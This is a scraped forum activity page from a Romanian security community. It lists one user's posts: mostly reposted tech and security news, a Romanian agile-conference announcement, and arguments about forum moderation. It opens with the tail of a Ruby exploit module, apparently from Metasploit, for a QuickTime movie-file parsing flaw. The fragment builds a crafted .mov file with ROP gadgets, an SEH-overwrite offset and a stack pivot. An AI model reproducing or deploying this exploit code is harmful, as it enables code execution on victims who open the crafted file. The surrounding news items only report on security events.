[t['Nop']].pack('V*') # Ret (QuickTime.qts) end def exploit buf = '' buf << rand_text_alpha(467) # 467 to align the pivot 10.times { buf << rop_nop(target) } buf << [ target['Pop'], # POP ESP; RET (QuickTime.qts) 0x20302020 # Target value for ESP (our ROP payload) ].pack('V*') buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size # Quicktime File Format Specifications: # https://developer.apple.com/standards/qtff-2001.pdf mov = "\x00\x00\x06\xDF" # File size mov << "moov" # Movie atom mov << "\x00\x00\x06\xD7" # size (1751d) mov << "rmra" # Reference Movie atom mov << "\x00\x00\x06\xCF" # size (1743d) mov << "rmda" # rmda atom mov << "\x00\x00\x06\xBF" # size (1727d) mov << "rdrf" # Data reference atom mov << "\x00\x00\x00\x00" # size set to 0 mov << "alis" # Data reference type: FS alias record mov << "\x00\x00\x06\xAA" # Size (1706d) mov << rand_text_alpha(8) mov << "\x00\x00\x06\x61" # Size (1633d) mov << rand_text_alpha(38) mov << "\x12" mov << rand_text_alpha(81) mov << "\xFF\xFF" mov << rand_text_alpha(18) mov << "\x00\x08" # Size (8d) mov << rand_text_alpha(8) mov << "\x00\x00" mov << "\x00\x08" # Size (8d) mov << rand_text_alpha(8) mov << "\x00\x00" mov << "\x00\x26" # Size (38d) mov << rand_text_alpha(38) mov << "\x00\x0F\x00\x0E" mov << "AA" # Size (must be invalid) mov << rand_text_alpha(12) mov << "\x00\x12\x00\x21" mov << rand_text_alpha(36) mov << "\x00" mov << "\x0F\x33" mov << rand_text_alpha(17) mov << "\x02\xF4" # Size (756h) mov << rand_text_alpha(756) mov << "\xFF\xFF\x00\x00\x00" mov << buf @exploit = mov super end end
  4. Matt
    6,000 systems shipped already. No pressure there then Several weeks ago, El Reg told you that Andy Monshaw, the long-time head of IBM's Storage Systems Division and more recently the general manager of the PureSystems modular systems business, had left Big Blue. Due to the Independence Day holiday in the United States, IBM was unable to confirm Monshaw's departure, but late last week Big Blue confirmed that Monshaw had indeed left the company and that a new executive had been tapped to replace him. The new general manager of the PureSystems product line is Andrew Sotiropoulos, who has been around many IBM divisions and groups over the years and who has deep experience with Chinese PC maker Lenovo Group. That connection may turn out to be more relevant than you think over the next six to nine months. Sotiropoulos does not yet have a full bio up on the IBM website, but the press relations team at IBM says that he spent 28 years with the company. Back in the early 2000s, he was in charge of the xSeries server business, the division of IBM that sold x86-based servers and today is called the System x product line. A few years later, Sotiropoulos moved to Australia and was put in charge of IBM's Asia/Pacific PC business. When IBM sold the PC business to Lenovo for $1.25bn at the end of 2004, Sotiropoulos was one of the 10,000 employees who made the leap from IBM to Lenovo, where he became general manager of Lenovo International and focused on selling the Chinese manufacturer's products outside of its home country, across the Asia/Pacific region. As best as we can piece together, Sotiropoulos rejoined IBM sometime in 2006 to run Big Blue's Integrated Technology Services division in Asia/Pacific. He was promoted to run all of the Global Technology Services business in the Asia/Pacific region in January 2009. Just in case you cannot keep it straight (heaven knows we can't), GTS is the part of the $60bn Global Services beast that does system outsourcing, so-called "integrated technology services" (which is not the same thing as systems integration), break-fix maintenance on hardware, and software support . The news of the new general manager for PureSystems comes as IBM completes its second quarter, and chief financial officer Mark Loughridge was boasting on a call last week that IBM had sold over 6,000 systems in the five quarters that the PureSystems modular machines have been available. Last November, IBM said that it had shipped PureSystems to move than 1,000 customers, and I guessed at the time that in the five months between the end of May 2012 when they started shipping and the middle of November when IBM was doing its stats, there could be anywhere from one to several thousand racks of Flex System iron across those customers. Some customers were starting with one chassis in a rack, some were buying multiple racks. By December 2012, IBM was saying it had shipped 2,300 PureSystems systems, and by systems it means full racks, says IBM PR, across all of the different variants: PureFlex, PureSystems, PureData, and PureApplication. In its first year, from the April 2012 launch to the April 2013 birthday, IBM said it shipped more than 4,000 systems (again, that is apparently a count of full racks of gear). So to add another 2,000 systems from the end of April to the end of June is a pretty good ramp. That is 1,000 racks per month for the past two months, compared to the average of around 285 racks per month for all of 2012 when the machines were actually shipping and 325 racks per month between January and April 2013, inclusive. Sales are accelerating for PureSystems, at least when measured by racks. The real question, though, is what were IBM's expectations, and did PureSystems meet them? We'll find out if IBM ever does sell its System x business to Lenovo, and if the PureSystems machines are included. We can't imagine that IBM would sell the PureSystems line, but stranger things have happened. ® Sursa TheRegister.co.uk
  5. Matt
    It's the moment malware writers worldwide have been waiting ages for: millions of royal-watchers at home and at work will be in front of their computers, hunting for the first pictures of the soon-to-be-born third heir to the throne. The Duchess of Cambridge's labour has started, it was confirmed this morning. Any baby (whatever its sex) will be third in line to become the Britain's king or queen following recent changes in UK law. And as with many a popular story - be it a natural disaster or celebrity death - malware-flingers have long been gestating plenty of scams and malware which they are more than ready to deliver. "Malware authors worldwide have been waiting ages for this," according to anti-malware veteran turned independent security blogger Graham Cluley. "Exclusive first pictures", "Secret video from inside delivery room" and "Sex revealed" images from the royal birth might become the theme of scams, according to Cluley. "I don't want to scaremonger, but it's easy to imagine," he said. The story of a royal birth will be so big that it's inevitable the bad guys will jump on the bandwagon, according to Cluley, who pointed out that malicious actors had previously menaced Wills and Kate. Cybercriminals were quick to exploit Kate and Wills' engagement. They were also quick to latch onto a story about a possible pregnant Kate Middleton doll in an attempt to entrap user in malware scams. High-profile news stories are often used to trick surfers into visiting scareware portals or exploit-ridden sites using search engine manipulation, or blackhat SEO tactics. But virus writers are unreliable types at the best of times, so scams do not always appear. Sean Sullivan, a security adviser at F-Secure, joked that scams might be more likely if Kate gives birth to twins. He said: "So, it it were twins, and a C-section, is it the doctor that decides the line of succession. Are there protocols?" Sursa TheRegister.co.uk
  6. Matt
    Hackers have developed a sophisticated StealRat botnet, capable of bypassing firms' advanced anti-spam defences, according to security firm Trend Micro. Trend Micro threat response engineer, Jessa De La Torre reported uncovering the botnet, claiming that it uses advanced techniques to hide the malware used in the scam. "While exploiting vulnerable websites to send out spam has already been exhausted by other botnets, StealRat stood out because it used simple yet subtle methods to improve the botnet's resiliency," wrote De La Torre. "Its operators set very clear boundaries. They used compromised sites to send out spam. They also made use of compromised machines, but only as mediators between the compromised sites and the spam server." De La Torre said by removing the interaction between the spam message and the campaign's central server, the criminals are able to bypass most businesses' cyber defences. "In this setup, the actual spam server is hiding behind three layers of unsuspecting victims: two compromised websites and an infected machine. The infected machine acts as a liaison between the spam server and the compromised website," wrote De La Torre. "As there is no interaction between the spam and server, it will appear the email has originated from the infected machine. The spam mail itself does not spread the malware, so there is no visible link between the two as well. In essence, they have separated the core functions and minimised interactions among them to cut off any threads that could link them to each other." The tactic has reportedly proven effective, with Trend estimating the attackers are using 85,000 unique IP addresses or domains to send out spam to seven million chosen email addresses. Each IP is estimated to contain roughly two spamming scripts. StealRat's discovery comes during a wider evolution of cyber criminals' techniques. Numerous security companies have warned that criminal and state-sponsored hackers are developing new defence-dodging tactics. Most recently security firm Context reported detecting a marked spike in the number of watering hole attacks targeting businesses with government contracts. Sursa V3.co.uk
  7. Matt
    UK PRIME MINISTER Dave Cameron is getting ready to announce a UK system for accessing adult content, an opt-in one that will probably be worse than no controls whatsoever. We had a whiff of this last week when ISPs were reacting to a letter from the government that asked them to kick in cash for craziness and consider making people think that the system would be default-on rather than an opt-in choice. The ISPs confirmed the letter and it was not well received, but the government decided to push on with its plans anyway. The Daily Mail crows about a "victory" over pornography, saying that the UK will close every internet user's access to adult content unless they choose to access it. Cameron was on the BBC's Andrew Marr show on Sunday when he spoke about his plans. He said that the internet is "corroding childhood" and needs controls, and of course he mentioned images of child abuse. "Just because its the internet doesn't mean there shouldn't be laws and rules and responsible behaviour," he added. "We need to get the companies to do more to. There are some good things that they are doing... Some people are putting appalling terms in and they are getting results. We need to have strong talks with those companies." He said that if the government does not get what it needs it will consider legislation. "I want them to do more," he added. "It's about companies wanting to act responsibly. They [are] enabling it. There is a further step that is required." Cameron will give his full speech later. Sursa TheInquirer.net
  8. Matt
    SOFTWARE DEVELOPER Mozilla has announced that it will release updates to Firefox OS every three months, with security updates scheduled every six weeks. Mozilla's rapid release schedule has been in force for over two years with the outfit's web browser Firefox seeing releases every six weeks. Now Mozilla has announced that its Firefox OS will move to a similar release schedule, though security updates will be released every six weeks with new features released every three months. According to Mozilla's manager of Release Management Alex Keybl, Firefox OS 1.0 skipped two releases of the Gecko rendering engine that powers it. Keybl said the firm had to work with more than just consumers but also mobile phone OEMs, carriers and chip makers, suggesting that a freeze in the engine used in Firefox OS 1.0 was needed at least three months before the operating system was shipped. However Keybl said that Mozilla will now move back to its preferred rapid release schedule with Firefox OS. Mozilla won't however be releasing new features in Firefox OS every six weeks, instead that release schedule will contain security fixes, with new features coming every three months. Keybl said, "Now that we have our v1.0 behind us and we're moving forward with even more partners, we're going to do our best to bring Firefox OS back into our heartbeat and will make quarterly feature releases available to partners along with six-weekly security updates for the previous two feature releases." Mozilla's Firefox OS is pitched at low-end smartphones and has attracted attention from mobile operators that see it as a controllable alternative to Apple's iOS and Google's Android. With Mozilla's rapid development cycle iteration, it could be a boon for mobile operators looking to make even more money from smartphones in the future. Sursa TheInquirer.net
  9. Matt
    A group of MIT researchers has unveiled a machine learning approach to TCP congestion which could form the foundation of the next round of improvements to the venerable protocol's performance. Dubbed “Remy”, their TCP control software is based on the idea that even sophisticated modern congestion control algorithms (like Compound TCP in Windows or Cubic in Linux) aren't flexible enough to cope with increasingly complex networks. Instead, Professor Hari Balakrishnan, Fujitsu Professor of Electrical Engineering & Computer Science at MIT, believes it's better to set computers to the task of identifying what TCP settings work best under particular conditions. Their work, pre-publication version here, appears to show that by replacing manually-generated congestion control with Remy, networks could achieve far better performance than any of the current TCP congestion control algorithms. The idea is that a subnetwork that's got a high-capacity fibre on the other side of the router is going to have completely different congestion behaviours to one that's connected over a 3G wireless connection. For example, the naturally-higher latency of a wireless connection can look like congestion to an endpoint, because of its slow ACK times. The fundamental problem the MIT group is trying to solve: TCP has a limited network model. “For example,” they write, “because TCP assumes that packet losses are due to congestion and reduces its transmission rate in response, some subnetwork designers have worked hard to hide losses. This often simply adds intolerably long packet delays.” “We believe that the best way to approach this question is to take the design of speci?c algorithmic mechanisms out of the hands of human designers (no matter how sophisticated!), and make the end-to-end algorithm be a function of the desired overall behaviour,” they continue. Describing TCP behaviour in terms of game theory, the MIT researchers write that the best thing any endpoint can do with a packet, at any given moment, is to send it – and if every endpoint simply hands its packet to the network, the network collapses into congestion. Remy is designed to work on a subnetwork basis – that is, all endpoints in a subnet are running Remy. Hence, for example, on a home network, Remy's aim would be to limit local congestion by having the hosts respond in the same way to that congestion. To do this, Remy expresses the sender's state as a function of the arrival time of acknowledgements from the far end (using an exponentially weighted moving average, EWMA); the timestamps on those acks (also weighted as EWMA); and the ratio between the most recent packet RTT and the minimum RTT seen in a session. The system then builds a table of rules for its subnetwork, iteratively adjusting congestion behaviours until a best-case is reached under given conditions. Sursa TheRegister.co.uk
  10. Matt
    Most enterprise networks are riddled with vulnerable Java installations, according to a new study whose release coincides with the discovery of another 0-day Java flaw. Less than one per cent of organisations are running the latest version of Java, according to a study by security software firm Bit9. The most frequently encountered version of Java running on endpoints is version 6 update 20, found on 9 per cent of systems and subject to 96 high-severity vulnerabilities. The average enterprise has more than 50 versions of Java installed across its PCs and servers, while five per cent of those enterprises have more than 100 versions of Java installed. This creates a smorgasbord of mouldy vulnerabilities for hackers to feast upon. At least part of the reason for this sorry state of affairs is that the Java installation and update process often does not remove older versions of the widely used technology. Most endpoints have multiple versions of Java installed, which means hackers can fairly easily determine what versions of Java an enterprise is running before targeting the oldest, most vulnerable versions. Eighty-two per cent of the endpoints analysed by Bit9 were running version 6 series of Java, which has the most known vulnerabilities of any version of Java. All these factors make Java a hacker and cyberspy favourite or the "endpoint technology most targeted by cyber attacks," as Bit 9 puts it. Bit9's study, put together in a report entitled Java Vulnerabilities: Write Once, Pwn Anywhere, is based on an analysis of Java deployment statistics on approximately 1 million endpoints at hundreds of enterprises worldwide. Oracle only recently revamped the Java update process so that older versions were purged. But these changes have done nothing by themselves to address legacy or orphaned Java installations, some of which date back to the dawn of personal computing, according to Bit9. In trying to minimise compatibility problems, a legacy of insecurity has been created. “For the past 15 years or so, IT administrators have been under the misconception that updating Java would address its security issues,” explained Harry Sverdlove, Bit9's chief technology officer. “They have been told that to improve security, they should continuously and aggressively deploy Java updates on all of their endpoints. Unfortunately, updating is not the same as upgrading. "Until very recently, those updates have failed to deliver the promised security upgrade because they have not removed older, highly vulnerable versions of Java they were intended to replace. As a result, most organisations have multiple versions of Java on their endpoints, including some that were released at the same time as Windows 95,” he added. Sorting out the mess involves picking up the cyber-security equivalent of an emergency audit. Enterprises should first evaluate how many versions of Java are running before deciding whether these older versions are needed for valid business reasons and, in particular, whether Java should be running in browsers. Several security firms routinely advise consumers and business to disable Java browser add-ons, which are seldom needed to surf the 'net but sometimes needed for internet applications. Users can then use security technologies from the likes of Bit9 and others to enforce these policy decisions. A video featuring Bit9 CTO Harry Sverdlove discussing the Java problem can be found here. Groundhog 0-day Separately??, Poland-based security research outfit Security Exploration claim to have unearthed a flaw that bypasses the security sandbox on Java 7, exposing host systems to malicious attacks. Adam Gowdiak, chief exec and founder of Security Explorations, explained the flaw in a post on a Full Disclosure mailing list. Security Explorations has created proof-of-concept exploit code PoC exploit code that does the business against Java SE 7 Update 25 and earlier. The vulnerability arises because of flaws in Reflection API (application programming interface), a technology that debuted in Java 7 SE and which has been the font of earlier security problems involving the latest version of the frequently abused software technology. The upshot is that the latest version of Java can be attacked by types of attack that are more than 10 years old, according to Gowdiak, who slammed Oracle for permitting a through-route to such a well-known attack, which he argues should have been straightforward to defend against. "If Oracle had any Software Security Assurance procedures adopted for Java SE, most of simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect." Gowdiak's find means the Java zero-day counter was reset on Thursday, yet again. Oracle is yet to respond to Gowdiak's discovery, so it's unclear if and when a fix might become available. The security giant last released a batch of Java updates in June (details here) and the next scheduled update is not due until October. Sursa TheRegister.co.uk
  11. Matt
    300 Euro.
  12. Matt
    Dozens of tech players and other organizations have asked Washington to allow them to reveal more information about the requests for user data. The tech industry wants to come clean -- or at least cleaner -- about its role in providing user data to the government and is asking the feds for permission to do so. In a letter sent Thursday to the White House and Congress, dozens of organizations involved in or concerned about the National Security Agency data-snopping controversy made their requests, Reuters reported. Companies want to be able to regularly provide statistics on the number and scope of user data records ordered by the government. They also want to be allowed to disclose the number of people, accounts, or devices targeted in those requests. On Wednesday, AllThingsD obtained a copy of the letter with the request: Apple, Google, and Facebook are among the tech players that signed the letter. Other organizations that have joined the effort include Human Rights Watch, Electronic Frontier Foundation, American Civil Liberties Union, Americans for Tax Reform, and FreedomWorks. The government, at least as voiced by NSA head Keith Alexander, seems open to the idea as long as it doesn't jeopardize investigations, Reuters added. Alexander also stressed that the companies had no choice in handing over user data to the government as they were compelled by court order to do so. As such, the companies want to offer more specifics on the type of data they were forced to provide. Sursa News.Cnet.com
  13. Matt
    Vulnerability in the security key that protects the card could allow eavesdropping on phone conversations, fraudulent purchases, or impersonation of the handset's owner, a security researcher warns. A vulnerability on SIM cards used in some mobile phones could allow malware infection and surveillance, a security researcher warns. Karsten Nohl, founder of Security Research Labs in Berlin, told The New York Times that he has identified a flaw in SIM encryption technology that could allow an attacker to obtain a SIM card's digital key, the 56-digit sequence that allows modification of the card. The flaw, which may affect as many as 750 million mobile phones, could allow eavesdropping on phone conversations, fraudulent purchases, or impersonation of the handset's owner, Nohl warned. "We can remotely install software on a handset that operates completely independently from your phone," warned Nohl, who said he managed the entire operation in less than two minutes using a standard PC. "We can spy on you. We know your encryption keys for calls. We can read your SMSs. More than just spying, we can steal data from the SIM card, your mobile identity, and charge to your account." The vulnerability was found in the Digital Encryption Standard, a cryptographic method developed by IBM in the 1970s that is used on about 3 billion cell phones every day. While the encryption method has been beefed up in the past decade, many handsets still use the older standard. Tests showed that 1,000 cards in Europe and North America exhibited signs of the flaw. Nohl, who plans to detail the flaw at the Black Hat security conference in Las Vegas next month, said he has already shared the results of his two-year study with GSM Association, a trade group representing the cell phone industry. GSM Association spokeswoman Claire Cranton told the Times that her organization had already passed the results on members of its group that still rely on the older standard. "We have been able to consider the implications and provide guidance to those network operators and SIM vendors that may be impacted," Cranton said in a statement. Nohl, who has a doctorate in computer engineering from the University of Virginia, made headlines in 2008 by publicizing weaknesses in wireless smart card chips used in transit systems around the globe. A year later, he cracked the algorithm used on GSM (Global System for Mobile Communications) cell phones, which is designed to prevent attackers from eavesdropping on calls. Sursa News.Cnet.com
  14. Matt
    You want to show you have clean hands? Here's USA PRISM Plus, an app that takes random shots of your phone and sends them to the NSA careers Twitter account. It may well be that the NSA is recording every breath you take, every move you make. But it's going to take them quite some time to review whether your breaths and moves are, in some way, significant or even troubling. So along comes an Android app that can help you by forewarning the NSA with "Look! It wasn't me!" I am grateful to Android Central for forewarning me about USA PRISM Plus. Being an Android app, this sprightly invention relies on utter openness. For it takes random shots of your cell phone and sends them to the NSA Careers Twitter account. You can decide how often you wish yourself to be exposed. Some might consider this trollish behavior -- though, for myself, I'm not sure whether the word "troll" has any consistent meaning. There's a certain charm in that the app's tweets are accompanied by the words "random security check." But one wonders what sanctions the NSA might take against those who clutter its Twitter with their titters? Moreover, what if you just happen to sext your dearest lover just at the moment that your USA PRISM Plus decides to take a screenshot? What if this sext is sent to the NSA? At a minimum, this would ruin your career chances. It's as well, though, to voice some concerns about the NSA Careers Twitter account too. It follows only seven Twitter accounts. Three belong to Mashable. Who will be the first to suggest some level of collaboration going on here? Sursa News.Cnet.com
  15. Matt
    Apple says its developer site was targeted in an attack, and that any information that was taken was encrypted. The site remains down. Apple's site for developers was attacked by an intruder last week, the company said Sunday. In a note to developers, the company said that an "intruder" tried to gain access to developer information, prompting the company to take the service down. Sensitive information on that site was encrypted, Apple said, however it's keeping the site down while security is being hardened. No estimate was provided for when it will be back up. Apple sent the following to developers on Sunday, detailing some of what happened : An Apple spokesman told CNET that the company's developer Web site is "not associated with any customer information" and that "customer information is securely encrypted." Apple's developer site is home to software downloads, documentation and forums for third-party software developers. The site became inaccessible to registered developers last Thursday, causing angst for users who could not access those features. On Friday the company noted that it would be extending membership periods to cover the outage, and that any published software would not be removed. The attack comes as Apple's gearing up for two new major releases of iOS and OS X. Developers have been readying their software for the new versions of those operating systems in time for their official release, which Apple has said will come in the fall. The outage sparked some concerns about there being a larger, behind the scenes security issue. Those concerns, which turned out to be well-founded, were amplified by scattered reports from users saying they had received password reset e-mails, suggesting others were attempting to gain access to their Apple ID accounts. Sursa News.cnet.com
  16. Matt
    In perioada 28-30 august va avea loc in Bucuresti, la Radisson Blu Hotel, a 3-a editie a non-conferintei anuale non-profit pe temele Agile, Lean si artizanat software (eng. Software Craftsmanship). Agile Lean Europe Unconference (ALE Unconference) va cuprinde keynote-uri, vorbitori invitati, discutii selectate de comunitate si discutii libere pe teme propuse de audienta in timpul sesiunilor de open space. De asemenea, vor avea loc World Cafes, un Gaming Lounge si multe activitati de socializare in timpul zilei si seara. Un keynote in fiecare zi Subiectele acoperite variaza de la noi tipuri de organizatii si culturi organizationale, tehnici avansate si aspecte de implementare ale agile in domeniul IT si nu numai. Jurgen Appelo este programat in prima zi, Liz Keogh in a doua zi iar Joe Justice va avea keynote-ul de inchidere al evenimentului. Surprizele din program Evenimentul va cuprinde si un melanj de discutii cu privire la practicile agile, psihologie, sociologie, management de proiect, programare si alte surprize. Retrospective, coaching pentru echipe agile, invatare, inovare si imbunatatire continua, sunt doar cateva dintre subiectele referitoare la practicile de agile. Dezbaterile despre psihologie vor acoperi subiecte cum ar fi puterea cognitiei, diferenta de perspectiva generata de rolul si pozitia in organizatie si chiar neurostiinta. Apoi, vor fi prezentari despre sociologia culturii organizationale, implicarea profesionala, crearea propriilor optiuni si de culture hacking. Pe partea de management de proiect vorbitorii vor atinge subiecte despre estimare, crearea proiectelor fara estimari, oferte si stabilirea preturilor. Programatorii vor invata despre unit testing, legacy code, design incremental si altele. Open Space Jumatate din program va fi Open Space. Ce este Open Space? Cel mai bun moment pentru a vorbi despre idei interesante noi si vechi referitoare la agile, lean si artizanat software. Programul este creat pe loc de catre participanti cu subiecte de interes pentru ei. Singurul lucru pe care trebuie il faca este sa lipeasca pe peretele numit "Market Place" ideile de discutie. Aceste idei sunt promovate ulterior prin tweet-uri, postari pe blog, articole sau chiar modalitati mai nebunesti, iar participantii selecteaza din “Market Place” ideile de interes pentru ei, adica sesiunile la care doresc sa participe. Un pic de istorie In 2011, cativa oameni pasionati au decis sa creeze o retea de profesionisti in Agile si Lean. deoarece existau numerosi profesionisti care inovau si creeau lucruri interesante in tarile lor, dar nu erau conectati. Grupul initial s-a intalnit in 2011 la conferinta XP de la Madrid si a decis sa creeze o conferinta anuala. Acest eveniment s-a dovedit a fi un succes, noutatea sa constand in lipsa restrictiilor conferintelor traditionale. Toata lumea putea contribui cu o idee si intr-un mod agil era integrata in conceptul evenimentului. Acesta este modul in care a fost creat Agile Lean Europe Unconference.Jumatate din eveniment este Open Space, unde programul reiese din ideile si energia participantilor. Conceptul de Open Space a fost initiat in 1980 de catre Harrison Owen, care a decis sa nu mai aiba o agenda predefinita pentru conferinte, in schimb a invitat oamenii la eveniment unde participantii au creat programul la fata locului.Prima editie a conferintei, ALE 2011, a fost organizata nu de un comitet al conferintei (eng. Conference Board), cum se obisnuia in mod traditional, ci de mai multe canapele ale conferintei (eng. Conference Sofas), unde oricine care a dorit sa contribuie s-a putut alatura. Fiecare canapea a fost responsabila de un anumit domeniu de organizare: Contabilitate, Marketing, Spouse & Kids, etc. Dezvoltarea agila de software este o familie de metodologii de project management in ingineria software, bazata pe dezvoltarea incrementala si care imbratiseaza si promoveaza schimbarile ce evolueaza de-a lungul intregului ciclu de viata al unui proiect. Aceste metodologii se caracterizeaza prin divizarea problemei in subprobleme mici si planificarea lor pe durate scurte. Se evita planificarea in detaliu pe termen lung, deoarece inerent in dezvoltarea de software apar intarzieri frecvente din cauza schimbarilor si detalierii cerintelor clientului. Scopul principal este ca, la terminarea fiecarui ciclu de dezvoltare, denumit iteratie, si a carui durata este de obicei de cateva saptamani, sa existe o versiune functionala a software-ului dezvoltat. Alaturati-va familiei noastre! Fiecare membru al comunitatilor Europene de Agile si Lean se simte ca facand parte dintr-o familie. Acesta este motivul pentru care organizatorii acestui an continua traditia de a-i invita pe participanti sa-si aduca familiile impreuna cu ei, pentru a se bucura de programul special pentru parteneri si copii (eng. Spouse & Kids).Familia Agile si Lean invita toti practicantii, teoreticienii si incepatorii sa se alature retelei ALE si ALE Unconference pentru ca ne dorim sa devenim mai buni impreuna prin schimb de informatii si experiente, dupa cum spune si motto-ul ALE: Because we share Despre Mosaic Works Link-ul de eveniment: ALE 2013 | The Agile Lean Europe 2013 conference in Bucharest Link-ul programului: ALE2013 Program | ALE 2013 Referinte: Manifesto for Agile Software Development Manifestul Agile Sursa : Comunicate de presa
  17. Matt

    Apple RST HoF !

    Matt replied to akkiliON's topic in Off-topic

    Felicitari si la mai multe.
  18. Matt
    El a zis clar : daca sunt reclamatii asupra moderatorilor sa ii spunem imediat. Eu nu am nimic personal cu niciunul dintre ei.Tot ce critic este atitudinea pe care unii o au.Eu sincer de un an de zile de cand urmaresc forumul din umbra atent, nu am vazut un moderator care sa vina si sa creeze ceva pentru comunitate.In afara de M2G si wildchild care ii mai vezi pe forum restul nu stiu ce fac. E ok , eu inteleg ca au o viata si au foarte multe cunostinte , dar puneti-va cunostintele aici. Ca postezi o data pe saptamana e ok. Ei au ajuns moderatori pentru cunostintele pe care le dobandesc si probabil ca au facut ceva pentru comunitatea asta acum ceva timp. Dar in ultimul timp nimic. Crede-ma ca nici mie nu imi face placere sa tot stau pe aici si sa ii injur pe toti si sa vorbesc urat.Uneori poate mai gresesc si persoana pe care o injur. Inteleg pe deasupra ca aici este RST locul unde nimeni nu-i sfant si iti este permis un vocabular mai "Deschis" . Mi-ar placea sa gasesc pe cineva care posteaza ceva de dragul de a o face si sa stau sa invat din ce posteaza el. Sincer, mi-ar placea.
  19. Matt
    Pai si ce ai vrea sa faca ? Stim toti ca nu avem cum sa eliminam prostia de pe forum. Trebuie ca imediat cand se posteaza un post de cacat gen " ISECENTER da cu flodu in mama " in secunda doi sa fie sters si banat. Pentru asta exista moderatorii.Moderatori care in ultima vreme n-au facut mai nimic. Iti dau un exemplu The.Legend : https://rstforums.com/forum/72501-hackerii-de-pe-isecenter-da-cu-fludul-rst.rst Al doilea post al meu a fost "Luceafarul" Dupa cum vezi acel topic a strans 43 de posturi de cacat,injuraturi etc / 5 pagini / 1300 de vizualizari . Domnu MrRip care e moderator a intrat pe thread si ce a facut? Mi-a dat mie warn si edit la post. NIMENI dar NIMENI din acel topic n-a patit altceva , desi daca citesti vei da de ce stim cu totii , injuraturi / off topic flame atac la persoana. Toate contravin regulamentului. Ce sa faca Nytro in situatia asta? De asta sunt 10 moderatori ca sa isi faca treaba. Dar ce sa faci daca din astia 10 MrRip are 3 posturi pe anul 2013 si vine si da un warn de cacat? Parerea mea este ca Nytro face destul de multe pentru comunitatea asta.Puteti sa ziceti ce vreti , dar merita mult mai mult respect. Uitati-va la numarul lui de posturi apoi si la posturile care le face , vedeti calitatea.
  20. Matt
    Pai ce vrei de la ownerul forumului ma ? Owner-ul forumului iti tine RST-ul sus dupa ce a fost inchis din cauza la unor cacati.Te opreste owner-ul sa faci ceva pentru comunitatea asta? Sa fim on-topic totusi..
  21. Matt
    Laba nu e o vocatie? Ia de aici : https://rstforums.com/forum/7197-hackerul-de-romania.rst https://rstforums.com/forum/16359-sfaturi-de-om-batran-pentru-ai-nostri-hackeri-tineri.rst
  22. Matt
    bodostyle : Te contrazic.De schimbat se pot schimba multe.Este nevoie doar de un om ca o schimbare sa se produca si sa nasca "ceva nou". Totul tine de cunostinte, de motivatie si inspiratie.
  23. Matt
    Gigi Becali a cedat psihic: vorbe?te de dou? ore în fa?a unei camere de supraveghere! - www.audvoci.ro
  24. Matt
    Poti sa mi-l dai tot mie, de ce sa te mai chinui?
  25. Matt
    Eu nu sunt in niciun staff.
×
×
  • Create New...